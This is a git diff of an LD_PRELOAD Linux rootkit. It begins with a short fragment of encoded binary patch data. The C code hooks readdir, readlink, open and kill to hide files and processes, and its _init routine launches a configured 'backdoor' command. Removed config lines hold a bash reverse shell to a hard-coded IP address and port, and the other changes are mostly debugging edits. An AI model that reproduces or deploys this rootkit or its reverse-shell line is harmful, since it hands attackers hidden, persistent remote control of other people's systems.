z?HlApP|>>o#{MDAUR`e$-L1Y@lJ!$v*7BEN2s5jxlu}85s2QmCD<9w1?A7z9q7<LC
zsPmw(LpZS3ubxvCtug}>7JB{kZVTm}`Y;vsoTB#EQ~MH{-=7IJ^E|u=p6XZjY9F1<
z7loqgC(_J3|0<4Sn!WklQza~_Z1Sh<PiXd4^0}<4TG%T+!HxDm#s2~aq@&_j&)bHy
z?^cSEmTUY;@D!pv-KJF8Ut=QTKsCoowNu0ux6AsgWCQ5?#H;bA+N1JH&%r8oZYV#F
etQ7}yG@+_j=}yLhrou&U*9eW%N>NhX{=Wc@+S!Nz

diff --git a/example/ctest.c b/example/ctest.c
index 5206bdc..85f34fc 100644
--- a/example/ctest.c
+++ b/example/ctest.c
@@ -110,4 +110,4 @@ int main() {
     }
 
     return 0;
-}
\ No newline at end of file
+}
diff --git a/example/uroot.cfg b/example/uroot.cfg
index 96620dc..cba4906 100644
--- a/example/uroot.cfg
+++ b/example/uroot.cfg
@@ -1,5 +1,7 @@
-backdoor = "bash -c 'bash -i >& /dev/tcp/123.249.89.38/50001 0>&1'";
+backdoor = "bash -c 'echo 't123abc'";
 
 hidden = (  
-  { path = "/etc/cerez.cfg" }
-);
\ No newline at end of file
+  { path = "/etc/uroot.cfg" },
+  { path = "/tmp/test" },
+  { path = "uroot.cfg" }
+);
diff --git a/ldpre.c b/ldpre.c
index c7cb28c..e37b6a0 100644
--- a/ldpre.c
+++ b/ldpre.c
@@ -58,6 +58,7 @@ void _init() {
   // backdoor is not already running
   // if so we can start it up
   backdoor = find_proc(cfg.backdoor);
+  // printf("backdoor0: %s %d\n", cfg.backdoor, backdoor.alive);
   if(backdoor.alive){
 		return;
   }
@@ -74,7 +75,7 @@ void _init() {
     // daemon, 0 means child process should
     // change dir to root dir, the other 0 means 
     // child processes std in/out will be redirected to /dev/null
-    daemon(0,0);
+    // daemon(0,0);
 
     // then we execute the backdoor
     system(cfg.backdoor);
@@ -91,6 +92,10 @@ bool path_check(const char* pathname){
   debug_file("running path check");
 
   // if no config then we fine
+  // printf("backdoor: %s\n", cfg.backdoor);
+  if(cfg.backdoor == NULL){
+	  return true;
+  }
   if(strcmp(cfg.backdoor, "NONE")==0){
     return true;
   }
@@ -122,10 +127,12 @@ bool path_check(const char* pathname){
   return true;
 }
 
+
+
 // malicious syscalls
 struct dirent *readdir(DIR *dirp){
   debug_file("readdir called now!");
-
+  // printf("readdir: %x", *oreaddir);
   struct dirent *dp = oreaddir(dirp);	
   while(dp != NULL && (!path_check(dp->d_name))){ 
     dp = oreaddir(dirp);
@@ -144,9 +151,10 @@ ssize_t readlink(const char *restrict pathname, char *restrict buf, size_t bufsi
   return oreadlink(pathname, buf, bufsiz);
 }
 
-
+/*
 FILE* fopen64(const char *restrict pathname, const char *restrict mode){
   debug_file("fopen64 called!");
+  printf("ofopen: %x", *ofopen);
   if(!path_check(pathname)){
 		errno = ENOENT;
     return NULL;
@@ -157,6 +165,7 @@ FILE* fopen64(const char *restrict pathname, const char *restrict mode){
 
 int open(const char *pathname, int flags, ...){
   debug_file("open called!");
+  printf("oopen: %x", *oopen);
   if(!path_check(pathname)){
     errno = ENOENT;
     return -1;
@@ -177,7 +186,7 @@ int unlinkat(int dirfd, const char *pathname, int flags){
 
   return ounlinkat(dirfd, pathname, flags);
 }
-
+*/
 int kill(pid_t pid, int sig){
   debug_file("kill called!");
   // here it checks if someone is trying to 
diff --git a/uroot.cfg b/uroot.cfg
deleted file mode 100644
index 7be467b..0000000
--- a/uroot.cfg
+++ /dev/null
@@ -1,6 +0,0 @@
-backdoor = "bash -c 'bash -i >& /dev/tcp/123.249.89.38/50001 0>&1'";
-
-hidden = (  
-  { path = "/etc/uroot.cfg" },
-  { path = "/tmp/test" }
-);
diff --git a/util.c b/util.c
index 6501503..294d4bb 100644
--- a/util.c
+++ b/util.c
@@ -73,8 +73,8 @@ struct proc find_proc(const char* name) {
     if(strstr(cmd, name)==NULL && strstr(cmd, "bash -i")==NULL){
       continue;
     }
-
     ret.pid[i] = atoi(entry->d_name);
+    // printf("cmd: %s %d\n", cmd, ret.pid[i]);
     i += 1;
     ret.pid = (int*)realloc(ret.pid, (i+1)*sizeof(int));
   }